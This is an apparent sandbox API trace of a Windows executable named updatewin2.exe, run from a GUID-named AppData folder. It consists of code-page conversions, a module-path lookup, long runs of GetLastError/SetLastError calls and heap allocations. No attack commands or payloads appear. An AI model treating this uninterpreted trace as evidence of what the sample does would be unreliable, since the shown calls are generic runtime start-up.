GetLastError () returned 0x0 [0171.174] SetLastError (dwErrCode=0x0) [0171.174] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0171.174] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䝵뒇㞅AĀ") returned 256 [0171.175] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䝵뒇㞅AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0171.175] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䝵뒇㞅AĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0171.175] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ«WµÚ\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0171.175] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x43acc0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\updatewin2.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\updatewin2.exe")) returned 0x5f [0171.175] GetLastError () returned 0x0 [0171.175] SetLastError (dwErrCode=0x0) [0171.175] GetLastError () returned 0x0 [0171.175] SetLastError (dwErrCode=0x0) [0171.175] GetLastError () returned 0x0 [0171.176] SetLastError (dwErrCode=0x0) [0171.176] GetLastError () returned 0x0 [0171.176] SetLastError (dwErrCode=0x0) [0171.176] GetLastError () returned 0x0 [0171.176] SetLastError (dwErrCode=0x0) [0171.176] GetLastError () returned 0x0 [0171.176] SetLastError (dwErrCode=0x0) [0171.176] GetLastError () returned 0x0 [0171.176] SetLastError (dwErrCode=0x0) [0171.176] GetLastError () returned 0x0 [0171.176] SetLastError (dwErrCode=0x0) [0171.176] GetLastError () returned 0x0 [0171.176] SetLastError (dwErrCode=0x0) [0171.176] GetLastError () returned 0x0 [0171.176] SetLastError (dwErrCode=0x0) [0171.176] GetLastError () returned 0x0 [0171.177] SetLastError (dwErrCode=0x0) [0171.177] GetLastError () returned 0x0 [0171.177] SetLastError (dwErrCode=0x0) [0171.177] GetLastError () returned 0x0 [0171.177] SetLastError (dwErrCode=0x0) [0171.177] GetLastError () returned 0x0 [0171.177] SetLastError (dwErrCode=0x0) [0171.177] GetLastError () returned 0x0 [0171.177] SetLastError (dwErrCode=0x0) [0171.177] GetLastError () returned 0x0 [0171.177] SetLastError (dwErrCode=0x0) [0171.177] GetLastError () returned 0x0 [0171.177] SetLastError (dwErrCode=0x0) [0171.177] GetLastError () returned 0x0 [0171.177] SetLastError (dwErrCode=0x0) [0171.177] GetLastError () returned 0x0 [0171.177] SetLastError (dwErrCode=0x0) [0171.177] GetLastError () returned 0x0 [0171.178] SetLastError (dwErrCode=0x0) [0171.178] GetLastError () returned 0x0 [0171.178] SetLastError (dwErrCode=0x0) [0171.178] GetLastError () returned 0x0 [0171.178] SetLastError (dwErrCode=0x0) [0171.178] GetLastError () returned 0x0 [0171.178] SetLastError (dwErrCode=0x0) [0171.178] GetLastError () returned 0x0 [0171.178] SetLastError (dwErrCode=0x0) [0171.178] GetLastError () returned 0x0 [0171.178] SetLastError (dwErrCode=0x0) [0171.178] GetLastError () returned 0x0 [0171.178] SetLastError (dwErrCode=0x0) [0171.178] GetLastError () returned 0x0 [0171.178] SetLastError (dwErrCode=0x0) [0171.178] GetLastError () returned 0x0 [0171.179] SetLastError (dwErrCode=0x0) [0171.179] GetLastError () returned 0x0 [0171.179] SetLastError (dwErrCode=0x0) [0171.179] GetLastError () returned 0x0 [0171.179] SetLastError (dwErrCode=0x0) [0171.179] GetLastError () returned 0x0 [0171.179] SetLastError (dwErrCode=0x0) [0171.179] GetLastError () returned 0x0 [0171.179] SetLastError (dwErrCode=0x0) [0171.179] GetLastError () returned 0x0 [0171.179] SetLastError (dwErrCode=0x0) [0171.179] GetLastError () returned 0x0 [0171.179] SetLastError (dwErrCode=0x0) [0171.179] GetLastError () returned 0x0 [0171.179] SetLastError (dwErrCode=0x0) [0171.179] GetLastError () returned 0x0 [0171.179] SetLastError (dwErrCode=0x0) [0171.180] GetLastError () returned 0x0 [0171.180] SetLastError (dwErrCode=0x0) [0171.180] GetLastError () returned 0x0 [0171.180] SetLastError (dwErrCode=0x0) [0171.180] GetLastError () returned 0x0 [0171.180] SetLastError (dwErrCode=0x0) [0171.180] GetLastError () returned 0x0 [0171.180] SetLastError (dwErrCode=0x0) [0171.180] GetLastError () returned 0x0 [0171.180] SetLastError (dwErrCode=0x0) [0171.180] GetLastError () returned 0x0 [0171.180] SetLastError (dwErrCode=0x0) [0171.180] GetLastError () returned 0x0 [0171.180] SetLastError (dwErrCode=0x0) [0171.180] GetLastError () returned 0x0 [0171.180] SetLastError (dwErrCode=0x0) [0171.180] GetLastError () returned 0x0 [0171.181] SetLastError (dwErrCode=0x0) [0171.181] GetLastError () returned 0x0 [0171.181] SetLastError (dwErrCode=0x0) [0171.181] GetLastError () returned 0x0 [0171.181] SetLastError (dwErrCode=0x0) [0171.181] GetLastError () returned 0x0 [0171.181] SetLastError (dwErrCode=0x0) [0171.181] GetLastError () returned 0x0 [0171.181] SetLastError (dwErrCode=0x0) [0171.181] GetLastError () returned 0x0 [0171.181] SetLastError (dwErrCode=0x0) [0171.181] GetLastError () returned 0x0 [0171.181] SetLastError (dwErrCode=0x0) [0171.181] GetLastError () returned 0x0 [0171.181] SetLastError (dwErrCode=0x0) [0171.181] GetLastError () returned 0x0 [0171.182] SetLastError (dwErrCode=0x0) [0171.182] GetLastError () returned 0x0 [0171.182] SetLastError (dwErrCode=0x0) [0171.182] GetLastError () returned 0x0 [0171.182] SetLastError (dwErrCode=0x0) [0171.182] GetLastError () returned 0x0 [0171.182] SetLastError (dwErrCode=0x0) [0171.182] GetLastError () returned 0x0 [0171.182] SetLastError (dwErrCode=0x0) [0171.182] GetLastError () returned 0x0 [0171.182] SetLastError (dwErrCode=0x0) [0171.182] GetLastError () returned 0x0 [0171.183] SetLastError (dwErrCode=0x0) [0171.183] GetLastError () returned 0x0 [0171.183] SetLastError (dwErrCode=0x0) [0171.183] GetLastError () returned 0x0 [0171.183] SetLastError (dwErrCode=0x0) [0171.183] GetLastError () returned 0x0 [0171.183] SetLastError (dwErrCode=0x0) [0171.183] GetLastError () returned 0x0 [0171.183] SetLastError (dwErrCode=0x0) [0171.183] GetLastError () returned 0x0 [0171.183] SetLastError (dwErrCode=0x0) [0171.183] GetLastError () returned 0x0 [0171.183] SetLastError (dwErrCode=0x0) [0171.183] GetLastError () returned 0x0 [0171.183] SetLastError (dwErrCode=0x0) [0171.183] GetLastError () returned 0x0 [0171.184] SetLastError (dwErrCode=0x0) [0171.184] GetLastError () returned 0x0 [0171.184] SetLastError (dwErrCode=0x0) [0171.184] GetLastError () returned 0x0 [0171.184] SetLastError (dwErrCode=0x0) [0171.184] GetLastError () returned 0x0 [0171.184] SetLastError (dwErrCode=0x0) [0171.184] GetLastError () returned 0x0 [0171.184] SetLastError (dwErrCode=0x0) [0171.184] GetLastError () returned 0x0 [0171.184] SetLastError (dwErrCode=0x0) [0171.184] GetLastError () returned 0x0 [0171.184] SetLastError (dwErrCode=0x0) [0171.184] GetLastError () returned 0x0 [0171.184] SetLastError (dwErrCode=0x0) [0171.184] GetLastError () returned 0x0 [0171.184] SetLastError (dwErrCode=0x0) [0171.185] GetLastError () returned 0x0 [0171.185] SetLastError (dwErrCode=0x0) [0171.185] GetLastError () returned 0x0 [0171.185] SetLastError (dwErrCode=0x0) [0171.185] GetLastError () returned 0x0 [0171.185] SetLastError (dwErrCode=0x0) [0171.185] GetLastError () returned 0x0 [0171.185] SetLastError (dwErrCode=0x0) [0171.185] GetLastError () returned 0x0 [0171.185] SetLastError (dwErrCode=0x0) [0171.185] GetLastError () returned 0x0 [0171.185] SetLastError (dwErrCode=0x0) [0171.185] GetLastError () returned 0x0 [0171.185] SetLastError (dwErrCode=0x0) [0171.185] GetLastError () returned 0x0 [0171.185] SetLastError (dwErrCode=0x0) [0171.186] GetLastError () returned 0x0 [0171.186] SetLastError (dwErrCode=0x0) [0171.186] GetLastError () returned 0x0 [0171.186] SetLastError (dwErrCode=0x0) [0171.186] GetLastError () returned 0x0 [0171.186] SetLastError (dwErrCode=0x0) [0171.186] GetLastError () returned 0x0 [0171.186] SetLastError (dwErrCode=0x0) [0171.186] GetLastError () returned 0x0 [0171.186] SetLastError (dwErrCode=0x0) [0171.186] GetLastError () returned 0x0 [0171.186] SetLastError (dwErrCode=0x0) [0171.186] GetLastError () returned 0x0 [0171.186] SetLastError (dwErrCode=0x0) [0171.186] GetLastError () returned 0x0 [0171.186] SetLastError (dwErrCode=0x0) [0171.186] GetLastError () returned 0x0 [0171.187] SetLastError (dwErrCode=0x0) [0171.187] GetLastError () returned 0x0 [0171.187] SetLastError (dwErrCode=0x0) [0171.187] GetLastError () returned 0x0 [0171.187] SetLastError (dwErrCode=0x0) [0171.187] GetLastError () returned 0x0 [0171.187] SetLastError (dwErrCode=0x0) [0171.187] GetLastError () returned 0x0 [0171.187] SetLastError (dwErrCode=0x0) [0171.187] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x0, Size=0x68) returned 0x1d81990 [0171.187] GetLastError () returned 0x0 [0171.187] SetLastError (dwErrCode=0x0) [0171.187] GetLastError () returned 0x0 [0171.187] SetLastError (dwErrCode=0x0) [0171.187] GetLastError () returned 0x0 [0171.187] SetLastError (dwErrCode=0x0) [0171.187] GetLastError () returned 0x0 [0171.188] SetLastError (dwErrCode=0x0) [0171.188] GetLastError () returned 0x0 [0171.188] SetLastError (dwErrCode=0x0) [0171.188] GetLastError () returned 0x0 [0171.188] SetLastError (dwErrCode=0x0) [0171.188] GetLastError () returned 0x0 [0171.188] SetLastError (dwErrCode=0x0) [0171.188] GetLastError () returned 0x0 [0171.188] SetLastError (dwErrCode=0x0) [0171.188] GetLastError () returned 0x0 [0171.189] SetLastError (dwErrCode=0x0) [0171.189] GetLastError () returned 0x0 [0171.189] SetLastError (dwErrCode=0x0) [0171.189] GetLastError () returned 0x0 [0171.189] SetLastError (dwErrCode=0x0) [0171.189] GetLastError () returned 0x0 [0171.189] SetLastError (dwErrCode=0x0) [0171.189] GetLastError () returned 0x0 [0171.189] SetLastError (dwErrCode=0x0) [0171.189] GetLastError () returned 0x0 [0171.190] SetLastError (dwErrCode=0x0) [0171.190] GetLastError () returned 0x0 [0171.190] SetLastError (dwErrCode=0x0) [0171.190] GetLastError () returned 0x0 [0171.190] SetLastError (dwErrCode=0x0) [0171.190] GetLastError () returned 0x0 [0171.190] SetLastError (dwErrCode=0x0) [0171.190] GetLastError () returned 0x0 [0171.191] SetLastError (dwErrCode=0x0) [0171.191] GetLastError () returned 0x0 [0171.191] SetLastError (dwErrCode=0x0) [0171.191] GetLastError () returned 0x0 [0171.191] SetLastError (dwErrCode=0x0) [0171.191] GetLastError () returned 0x0 [0171.191] SetLastError (dwErrCode=0x0) [0171.191] GetLastError () returned 0x0 [0171.191] SetLastError (dwErrCode=0x0) [0171.191] GetLastError () returned 0x0 [0171.192] SetLastError (dwErrCode=0x0) [0171.192] GetLastError () returned 0x0 [0171.192] SetLastError (dwErrCode=0x0) [0171.192] GetLastError () returned 0x0 [0171.192] SetLastError (dwErrCode=0x0) [0171.192] GetLastError () returned 0x0 [0171.192] SetLastError (dwErrCode=0x0) [0171.192] GetLastError () returned 0x0 [0171.192] SetLastError (dwErrCode=0x0) [0171.192] GetLastError () returned 0x0 [0171.193] SetLastError (dwErrCode=0x0) [0171.193] GetLastError () returned 0x0 [0171.193] SetLastError (dwErrCode=0x0) [0171.193] GetLastError () returned 0x0 [0171.193] SetLastError (dwErrCode=0x0) [0171.193] GetLastError () returned 0x0 [0171.193] SetLastError (dwErrCode=0x0) [0171.193] GetLastError () returned 0x0 [0171.193] SetLastError (dwErrCode=0x0) [0171.193] GetLastError () returned 0x0 [0171.193] SetLastError (dwErrCode=0x0) [0171.193] GetLastError () returned 0x0 [0171.193] SetLastError (dwErrCode=0x0) [0171.193] GetLastError () returned 0x0 [0171.194] SetLastError (dwErrCode=0x0) [0171.194] GetLastError () returned 0x0 [0171.194] SetLastError (dwErrCode=0x0) [0171.194] GetLastError () returned 0x0 [0171.194] SetLastError (dwErrCode=0x0) [0171.194] GetLastError () returned 0x0 [0171.194] SetLastError (dwErrCode=0x0) [0171.194] GetLastError () returned 0x0 [0171.194] SetLastError (dwErrCode=0x0) [0171.194] GetLastError () returned 0x0 [0171.194] SetLastError (dwErrCode=0x0) [0171.194] GetLastError () returned 0x0 [0171.194] SetLastError (dwErrCode=0x0) [0171.194] GetLastError () returned 0x0 [0171.194] SetLastError (dwErrCode=0x0) [0171.194] GetLastError () returned 0x0 [0171.195] SetLastError (dwErrCode=0x0) [0171.195] GetLastError () returned 0x0 [0171.195] SetLastError (dwErrCode=0x0) [0171.195] GetLastError () returned 0x0 [0171.195] SetLastError (dwErrCode=0x0) [0171.195] GetLastError () returned 0x0 [0171.195] SetLastError (dwErrCode=0x0) [0171.195] GetLastError () returned 0x0 [0171.195] SetLastError (dwErrCode=0x0) [0171.195] GetLastError () returned 0x0 [0171.195] SetLastError (dwErrCode=0x0) [0171.195] GetLastError () returned 0x0 [0171.195] SetLastError (dwErrCode=0x0) [0171.195] GetLastError () returned 0x0 [0171.195] SetLastError (dwErrCode=0x0) [0171.195] GetLastError () returned 0x0 [0171.196] SetLastError (dwErrCode=0x0) [0171.196] GetLastError () returned 0x0 [0171.196] SetLastError (dwErrCode=0x0) [0171.196] GetLastError () returned 0x0 [0171.196] SetLastError (dwErrCode=0x0) [0171.196] GetLastError () returned 0x0 [0171.196] SetLastError (dwErrCode=0x0) [0171.196] GetLastError () returned 0x0 [0171.196] SetLastError (dwErrCode=0x0) [0171.196] GetLastError () returned 0x0 [0171.196] SetLastError (dwErrCode=0x0) [0171.196] GetLastError () returned 0x0 [0171.196] SetLastError (dwErrCode=0x0) [0171.196] GetLastError () returned 0x0 [0171.196] SetLastError (dwErrCode=0x0) [0171.196] GetLastError () returned 0x0 [0171.197] SetLastError (dwErrCode=0x0) [0171.197] GetLastError () returned 0x0 [0171.197] SetLastError (dwErrCode=0x0) [0171.197] GetLastError () returned 0x0 [0171.197] SetLastError (dwErrCode=0x0) [0171.197] GetLastError () returned 0x0 [0171.197] SetLastError (dwErrCode=0x0) [0171.197] GetLastError () returned 0x0 [0171.197] SetLastError (dwErrCode=0x0) [0171.197] GetLastError () returned 0x0 [0171.197] SetLastError (dwErrCode=0x0) [0171.197] GetLastError () returned 0x0 [0171.197] SetLastError (dwErrCode=0x0) [0171.197] GetLastError () returned 0x0 [0171.197] SetLastError (dwErrCode=0x0) [0171.197] GetLastError () returned 0x0 [0172.197] SetLastError (dwErrCode=0x0) [0172.197] GetLastError () returned 0x0 [0172.197] SetLastError (dwErrCode=0x0) [0172.197] GetLastError () returned 0x0 [0172.197] SetLastError (dwErrCode=0x0) [0172.197] GetLastError () returned 0x0 [0172.197] SetLastError (dwErrCode=0x0) [0172.197] GetLastError () returned 0x0 [0172.197] SetLastError (dwErrCode=0x0) [0172.197] GetLastError () returned 0x0 [0172.197] SetLastError (dwErrCode=0x0) [0172.197] GetLastError () returned 0x0 [0172.197] SetLastError (dwErrCode=0x0) [0172.197] GetLastError () returned 0x0 [0172.198] SetLastError (dwErrCode=0x0) [0172.198] GetLastError () returned 0x0 [0172.198] SetLastError (dwErrCode=0x0) [0172.198] GetLastError () returned 0x0 [0172.198] SetLastError (dwErrCode=0x0) [0172.198] GetLastError () returned 0x0 [0172.198] SetLastError (dwErrCode=0x0) [0172.198] GetLastError () returned 0x0 [0172.198] SetLastError (dwErrCode=0x0) [0172.198] GetLastError () returned 0x0 [0172.198] SetLastError (dwErrCode=0x0) [0172.198] GetLastError () returned 0x0 [0172.198] SetLastError (dwErrCode=0x0) [0172.198] GetLastError () returned 0x0 [0172.199] SetLastError (dwErrCode=0x0) [0172.199] GetLastError () returned 0x0 [0172.199] SetLastError (dwErrCode=0x0) [0172.199] GetLastError () returned 0x0 [0172.199] SetLastError (dwErrCode=0x0) [0172.199] GetLastError () returned 0x0 [0172.199] SetLastError (dwErrCode=0x0) [0172.199] GetLastError () returned 0x0 [0172.199] SetLastError (dwErrCode=0x0) [0172.199] GetLastError () returned 0x0 [0172.199] SetLastError (dwErrCode=0x0) [0172.199] GetLastError () returned 0x0 [0172.199] SetLastError (dwErrCode=0x0) [0172.199] GetLastError () returned 0x0 [0172.199] SetLastError (dwErrCode=0x0) [0172.200] GetLastError () returned 0x0 [0172.200] SetLastError (dwErrCode=0x0) [0172.200] GetLastError () returned 0x0 [0172.200] SetLastError (dwErrCode=0x0) [0172.200] GetLastError () returned 0x0 [0172.200] SetLastError (dwErrCode=0x0) [0172.200] GetLastError () returned 0x0 [0172.200] SetLastError (dwErrCode=0x0) [0172.200] GetLastError () returned 0x0 [0172.200] SetLastError (dwErrCode=0x0) [0172.200] GetLastError () returned 0x0 [0172.200] SetLastError (dwErrCode=0x0) [0172.200] GetLastError () returned 0x0 [0172.200] SetLastError (dwErrCode=0x0) [0172.200] GetLastError () returned 0x0 [0172.201] SetLastError (dwErrCode=0x0) [0172.201] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x98) returned 0x1d81a00 [0172.201] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x1f) returned 0x1d81aa0 [0172.201] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x36) returned 0x1d81ac8 [0172.201] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x37) returned 0x1d81b08 [0172.201] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x3c) returned 0x1d81b48 [0172.201] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x31) returned 0x1d81b90 [0172.201] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x17) returned 0x1d81bd0 [0172.201] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x24) returned 0x1d81bf0 [0172.201] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x14) returned 0x1d81c20 [0172.201] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0xd) returned 0x1d81c40 [0172.201] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x25) returned 0x1d81c58 [0172.201] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x39) returned 0x1d81c88 [0172.201] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x18) returned 0x1d81cd0 [0172.201] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x17) returned 0x1d81cf0 [0172.201] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0xe) returned 0x1d81d10 [0172.201] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x69) returned 0x1d81d28 [0172.201] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x3e) returned 0x1d81da0 [0172.201] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x1b) returned 0x1d81de8 [0172.201] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x1d) returned 0x1d81e10 [0172.201] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x48) returned 0x1d81e38 [0172.201] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x12) returned 0x1d81e88 [0172.201] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x18) returned 0x1d81ea8 [0172.201] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x1b) returned 0x1d81ec8 [0172.201] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x24) returned 0x1d81ef0 [0172.201] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x29) returned 0x1d81f20 [0172.202] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x1e) returned 0x1d81f58 [0172.202] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x41) returned 0x1d81f80 [0172.202] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x17) returned 0x1d81fd0 [0172.202] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0xf) returned 0x1d81ff0 [0172.202] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x16) returned 0x1d82008 [0172.202] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x2a) returned 0x1d82028 [0172.202] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x29) returned 0x1d82060 [0172.202] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x15) returned 0x1d82098 [0172.202] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x1e) returned 0x1d820b8 [0172.202] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x2a) returned 0x1d820e0 [0172.202] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x12) returned 0x1d82118 [0172.202] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x18) returned 0x1d82138 [0172.202] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x46) returned 0x1d82158 [0172.202] HeapFree (in: hHeap=0x1d80000, dwFlags=0x0, lpMem=0x1d811f8 | out: hHeap=0x1d80000) returned 1 [0172.204] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x800) returned 0x1d821a8 [0172.204] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x80) returned 0x1d811f8 [0172.204] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404e49) returned 0x0 [0172.205] RtlSizeHeap (HeapHandle=0x1d80000, Flags=0x0, MemoryPointer=0x1d811f8) returned 0x80 [0172.205] GetLastError () returned 0x0 [0172.205] SetLastError (dwErrCode=0x0) [0172.205] GetLastError () returned 0x0 [0172.205] SetLastError (dwErrCode=0x0) [0172.205] GetLastError () returned 0x0 [0172.205] SetLastError (dwErrCode=0x0) [0172.205] GetLastError () returned 0x0 [0172.206] 